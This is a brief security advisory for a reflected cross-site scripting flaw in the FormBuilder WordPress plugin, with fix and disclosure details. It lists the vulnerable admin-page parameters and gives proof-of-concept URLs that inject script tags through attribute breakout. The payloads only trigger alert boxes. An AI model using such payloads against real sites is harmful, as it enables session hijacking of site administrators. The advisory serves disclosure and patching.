FormBuilder [Reflected XSS]
Description
Vulnerable params:
$_GET['pageNumber']$_GET['formFilterID']$_GET['formSearchQuery']
The payload is visible in various plugin pages, but they are all under
wp-admin/tools.php?page=formbuilder.php.
Additional params may be required in order for this attack to work.
The attacker could also use HTML events because params are printed inside HTML attributes.
PoC
http://sbwp4.dev/wp-admin/tools.php?page=formbuilder.php&pageNumber="><script>alert(1)</script>
http://sbwp4.dev/wp-admin/tools.php
?page=formbuilder.php
&fbaction=formResults
&formFilterID="><script>alert(/formFilterID/)</script>
&formSearchQuery="><script>alert(/formSearchQuery/)</script>
&pageNumber="><script>alert(/pageNumber/)</script>
Solution
Upgrade to v1.06
INFO
- 26 July 2016
- Pan Vag
- www.warkior.com
- FormBuilder
- WordPress 4.5.2
- DWF-2016-87105